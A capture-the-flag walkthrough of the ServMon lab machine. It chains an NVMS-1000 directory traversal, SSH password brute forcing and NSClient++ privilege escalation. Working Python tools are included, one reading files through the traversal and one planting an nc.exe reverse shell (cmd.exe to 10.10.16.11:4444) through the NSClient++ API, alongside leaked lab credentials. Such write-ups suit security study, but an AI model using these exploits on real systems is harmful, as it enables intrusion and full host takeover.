Recon
nmap
└─$ nmap -T5 -p- -sV -A -Pn 10.10.10.184
PORT STATE SERVICE VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
5666/tcp open tcpwrapped
6063/tcp open x11?
6699/tcp open napster?
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
We face a Windows machine. Port 80 hosts the login page of an NVMS-1000 web client (“NVMS-1000 is a monitoring client specifically designed for network video surveillance”), and port 8443 hosts the NSClient++ web interface, which asks for a password before showing any page. Port 5666 is the NRPE listener that NSClient++ also provides (nmap only reports it as tcpwrapped), and the OpenSSH service on port 22 will matter as soon as we have credentials.
Website login page at http://10.10.10.184/Pages/login.htm
NSClient++ monitoring site at https://10.10.10.184:8443/index.html
ftp
As the nmap scan shows (ftp-anon: Anonymous FTP login allowed), the FTP server accepts anonymous logins.
└─$ ftp anonymous@10.10.10.184
Connected to 10.10.10.184.
ftp> ls -alih
02-28-22 07:35PM <DIR> Users
ftp> ls -alih
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
02-28-22 07:36PM 182 Notes to do.txt # Nathan
02-28-22 07:36PM 168 Confidential.txt # Nadine
We found 2 folders (Nathan & Nadine), each holding one text file.
Nadine - Confidential.txt
└─$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
A message addressed to Nathan. We now know that a Passwords.txt file containing passwords probably sits on Nathan’s Desktop (most likely C:\Users\Nathan\Desktop\Passwords.txt, since the FTP root mirrors the Users profile directories).
Nathan - Notes_to_do.txt
└─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
Vulnerabilities
NVMS-1000
└─$ searchsploit nvms 1000
------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
------------------------------------- ---------------------------------
NVMS-1000 is vulnerable to a directory traversal (CVE-2019-20085, listed in the tags below): an unauthenticated GET with enough ../ segments in the path returns arbitrary files from the host. If Nathan has not deleted Passwords.txt yet, we can read it this way.
NSClient++
└─$ searchsploit nsclient
------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation | windows/local/46802.txt
------------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 has both a local privilege escalation (46802) and an authenticated remote code execution (48360). Both rely on the same feature: an authenticated web API user can register external scripts, which the service then runs with its own privileges.
NVMS-1000
First, I test whether our NVMS-1000 instance is vulnerable to the directory traversal.
Test of the directory traversal
And we can read arbitrary files! Let’s grab the password file.
Directory traversal on Passwords.txt file
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Nathan forgot to delete the file :) We got 7 candidate passwords.
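The traversal request itself is only shown as a screenshot above. Below is an added example (not code from the original write-up) that fetches a file through the NVMS-1000 traversal with a hand-built HTTP request. The point worth knowing: most HTTP clients (urllib3 1.25+, and curl unless you pass --path-as-is) normalise away the /../ segments before sending, which silently removes the traversal, so the request is written to the socket directly. Host and port are the ones from the scan; the traversal depth of 12 and the path C:\Users\Nathan\Desktop\Passwords.txt are assumptions.

```python
import socket

# Added example, not code from the original write-up: fetch a file through the
# NVMS-1000 directory traversal (CVE-2019-20085) with a raw HTTP/1.1 request.
# Normal HTTP clients collapse "/../" before sending, so the request bytes are
# built by hand and written to the socket as-is.

TARGET_HOST = "10.10.10.184"   # from the nmap scan
TARGET_PORT = 80
TRAVERSAL_DEPTH = 12           # assumption: extra "../" are harmless once the drive root is reached


def traversal_path(relative_path, depth=TRAVERSAL_DEPTH):
    """Turn 'Users/Nathan/Desktop/Passwords.txt' into '/../../.../Users/Nathan/Desktop/Passwords.txt'."""
    rel = relative_path.replace("\\", "/").lstrip("/")
    return "/" + "../" * depth + rel


def build_request(relative_path, host=TARGET_HOST, depth=TRAVERSAL_DEPTH):
    """Raw GET request with the traversal path left exactly as written."""
    return (
        "GET {} HTTP/1.1\r\n"
        "Host: {}\r\n"
        "User-Agent: traversal-check\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).format(traversal_path(relative_path, depth), host).encode()


def parse_response(raw):
    """Split a raw HTTP response into (status code, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    return int(status_line.split(b" ")[1]), body


def parse_password_list(body):
    """Passwords.txt holds one candidate per line; drop blanks and surrounding whitespace."""
    text = body.decode("utf-8", errors="replace")
    return [line.strip() for line in text.splitlines() if line.strip()]


def fetch_file(relative_path, host=TARGET_HOST, port=TARGET_PORT, timeout=10):
    """Send the traversal request and return (status, body). Needs network access."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(relative_path, host))
        chunks = []
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break          # server ignored Connection: close; use what we have
            if not data:
                break
            chunks.append(data)
    return parse_response(b"".join(chunks))


if __name__ == "__main__":
    # Sanity check with a file that always exists on Windows.
    status, body = fetch_file("Windows/win.ini")
    print("win.ini ->", status, body[:40])
    # Then the file Nadine's note pointed at (path is an assumption).
    status, body = fetch_file("Users/Nathan/Desktop/Passwords.txt")
    if status == 200:
        for pw in parse_password_list(body):
            print(pw)
```

Checking win.ini first separates "the traversal works" from "that particular file does not exist", which matters when a 404 comes back for the guessed Desktop path.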
Bruteforce logins
Using hydra
The users file holds the two names from the FTP listing (Nathan, Nadine) and the pass file holds the 7 passwords above. I found valid credentials for nadine that allow us to connect to the SSH server.
└─$ hydra -L users -P pass 10.10.10.184 ssh
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
└─$ ssh nadine@10.10.10.184
nadine@SERVMON C:\Users\Nadine>type Desktop\user.txt
**************************6e904b
We can get the user flag :)
Path to the privesc
Local recon
Now that we are connected to the machine, we can read the NSClient++ web password with the nscp command, run from the install directory.
nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
But we can’t log in with that password from our machine.
Login failure using the admin password
Looking at the config file C:\Program Files\NSClient++\nsclient.ini, we find why: the web server only accepts connections from localhost (allowed hosts = 127.0.0.1). Note that the file is readable by our unprivileged user, which is what leaks the admin password in the first place.
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
I tried to upload WinPEAS but sadly Windows Defender deleted it.
NSClient++
As shown by the searchsploit output, NSClient++ 0.5.2.35 has a privilege escalation vulnerability: an authenticated web API user can register an external script, and the service, which runs as NT AUTHORITY\SYSTEM, executes it.
From Nathan’s notes and our local recon, we know the NSClient++ web interface has been locked down to local access only, so the API requests must originate from the host itself (our SSH session, or an SSH local port forward through nadine’s account).
Running the nscp command we can check the installed version.
PS C:\Program Files\NSClient++> .\nscp.exe test
[...]
core NSClient++ - 0.5.2.35
The NSClient++ version matches the vulnerable one. The public exploit (46802) needs two modules enabled:
- CheckExternalScripts
- Scheduler
The Scheduler is only needed when the script is triggered through a scheduled check; running it through the queries API, as we do further down, only exercises CheckExternalScripts.
Using the nscp command we can list the loaded modules.
PS C:\Program Files\NSClient++> .\nscp.exe settings --list --path /modules
/modules.CheckDisk=disabled
/modules.CheckEventLog=disabled
/modules.CheckExternalScripts=enabled
/modules.CheckHelpers=disabled
/modules.CheckNSCP=disabled
/modules.CheckSystem=disabled
/modules.CheckTaskSched=enabled
/modules.NRPEServer=enabled
/modules.Scheduler=enabled
/modules.WEBServer=enabled
Both needed modules are enabled.
Then, we have to create a .bat script that starts a reverse shell, and upload nc.exe to the target. The script is a single line that runs nc.exe against our listener.
# send nc.exe to the target (the directory C:\Windows\Temp\c must already exist, otherwise scp writes a file named c)
└─$ scp nc.exe nadine@10.10.10.184:"C:\Windows\Temp\c"
# exploit.bat, one line:
C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e cmd.exe
Now, we have to add our script to the NSClient++ settings. I tried to add it on the command line but it wouldn’t work.
PS C:\Program Files\NSClient++> .\nscp.exe settings --path "/settings/external scripts/scripts" --key "exploit.bat" --set "C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e cmd.exe"
NSClient++ API
After some research, I found that an API exists. The scripts API can be used to list, read and modify the scripts which NSClient++ can run.
First, I check whether we can reach the API with the admin password from the host itself.
nadine@SERVMON C:\Users\Nadine>curl -s -k -u admin https://localhost:8443/api/v1/scripts
Enter host password for user 'admin': ew2x6SsGTxjRwXOT
[{"module":"CheckExternalScripts","name":"ext","runtime_url":"https://localhost:8443/api/v1/scripts/ext","title":"CheckExternalScripts"}]
It works! Let’s try to add our script through the API.
nadine@SERVMON C:\Users\Nadine>curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/exploit.bat --data-binary "C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e cmd.exe"
Added exploit as scripts\exploit.bat
Checking that the script has been written to the NSClient++ scripts directory.
PS C:\Program Files\NSClient++> ls .\scripts\
Directory: C:\Program Files\NSClient++\scripts
[...]
-a---- 9/17/2022 8:14 AM 57 exploit.bat
PS C:\Program Files\NSClient++> cat .\scripts\exploit.bat
C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e cmd.exe
Our script is now registered as the query exploit (the file name without its extension, as the API reply above says). Now we can use the queries API to run it.
# make sure nc.exe has not been deleted by Windows Defender (it happened to me)
nadine@SERVMON C:\Users\Nadine>curl -s -k -u admin:ew2x6SsGTxjRwXOT "https://localhost:8443/api/v1/queries/exploit/commands/execute?time=10s"
# on the attacking machine
└─$ rlwrap nc -lvnp 4444
C:\Program Files\NSClient++>whoami
nt authority\system
It works! The script ran as NT AUTHORITY\SYSTEM, so we can read the root flag :)
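The three curl calls above (list script runtimes, register the script, execute the query) form one chain where each step should be checked before the next one runs. Below is an added example, not code from the original write-up, that wraps the same NSClient++ REST endpoints in a small Python client. The endpoints, the admin password, the listener 10.10.16.11:4444 and the nc.exe path are the ones shown on this page; the `opener` argument is an injectable transport (an assumption of this example, not an NSClient++ feature) so the request construction can be exercised offline.

```python
import base64
import json
import ssl
import urllib.request

# Added example, not code from the original write-up or from NSClient++ itself.
# Same REST calls as the curl commands on this page, with each step checked.

BASE_URL = "https://localhost:8443"
USERNAME = "admin"
PASSWORD = "ew2x6SsGTxjRwXOT"           # from nsclient.ini / nscp web -- password --display
LISTENER = "10.10.16.11 4444"           # attacker listener from the write-up
NC_PATH = r"C:\Windows\Temp\c\nc.exe"  # where scp dropped nc.exe


def basic_auth_header(username, password):
    """curl -u user:pass sends exactly this header."""
    token = base64.b64encode("{}:{}".format(username, password).encode()).decode()
    return "Basic " + token


class NSClientAPI:
    def __init__(self, base_url=BASE_URL, username=USERNAME, password=PASSWORD, opener=None):
        self.base_url = base_url.rstrip("/")
        self.headers = {"Authorization": basic_auth_header(username, password)}
        self.opener = opener or self._https_opener   # opener: assumed test hook, returns (status, body)

    @staticmethod
    def _https_opener(request):
        # The web server presents a self-signed cert (CN=localhost, expired 2021): equivalent of curl -k.
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        with urllib.request.urlopen(request, context=ctx, timeout=30) as resp:
            return resp.status, resp.read()

    def _call(self, method, path, body=None):
        req = urllib.request.Request(self.base_url + path, data=body, headers=self.headers, method=method)
        return self.opener(req)

    def script_runtimes(self):
        """GET /api/v1/scripts: an entry named 'ext' means CheckExternalScripts is exposed."""
        status, data = self._call("GET", "/api/v1/scripts")
        if status != 200:
            raise RuntimeError("scripts API returned {}".format(status))
        return json.loads(data.decode())

    def add_external_script(self, filename, command_line):
        """PUT /api/v1/scripts/ext/scripts/<filename>: stored as <install dir>\\scripts\\<filename>."""
        return self._call("PUT", "/api/v1/scripts/ext/scripts/" + filename, command_line.encode())

    def execute(self, query, time="10s"):
        """GET /api/v1/queries/<query>/commands/execute: runs the script as the service account."""
        return self._call("GET", "/api/v1/queries/{}/commands/execute?time={}".format(query, time))


def query_name(script_filename):
    """NSClient++ names the query after the script file minus its extension ('exploit.bat' -> 'exploit')."""
    return script_filename.rsplit(".", 1)[0]


def reverse_shell_command(nc_path=NC_PATH, listener=LISTENER, shell="cmd.exe"):
    return "{} {} -e {}".format(nc_path, listener, shell)


def run_chain(api, script_filename="exploit.bat", nc_path=NC_PATH):
    """check access -> register script -> execute it; returns the three results."""
    runtimes = api.script_runtimes()
    if not any(r.get("name") == "ext" for r in runtimes):
        raise RuntimeError("CheckExternalScripts runtime not exposed; the chain cannot work")
    added = api.add_external_script(script_filename, reverse_shell_command(nc_path))
    ran = api.execute(query_name(script_filename))
    return runtimes, added, ran


if __name__ == "__main__":
    # Start `rlwrap nc -lvnp 4444` on the attacking machine before running this.
    for result in run_chain(NSClientAPI()):
        print(result)
```

Run it on the host itself, as the page does, or from the attacking machine through an SSH local port forward such as `ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184`, which makes the connection arrive at NSClient++ from 127.0.0.1 and so satisfies the allowed hosts setting.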
C:\Users\Administrator\Desktop>type root.txt
**************************9622c5
Powershell, Easy, Internal, Apache, Penetration Tester Level 1, Local File Inclusion, CVE-2019-20085, A05:2021-Security Misconfiguration, Enumeration, FTP, Clear Text Credentials, A06:2021-Vulnerable And Outdated Components, Tunneling, SSH, CVE Exploitation, Public Vulnerabilities, NVM-1000, Weak Permissions, NSClient++, Password Spraying, Port Forwarding, Anonymous/Guest Access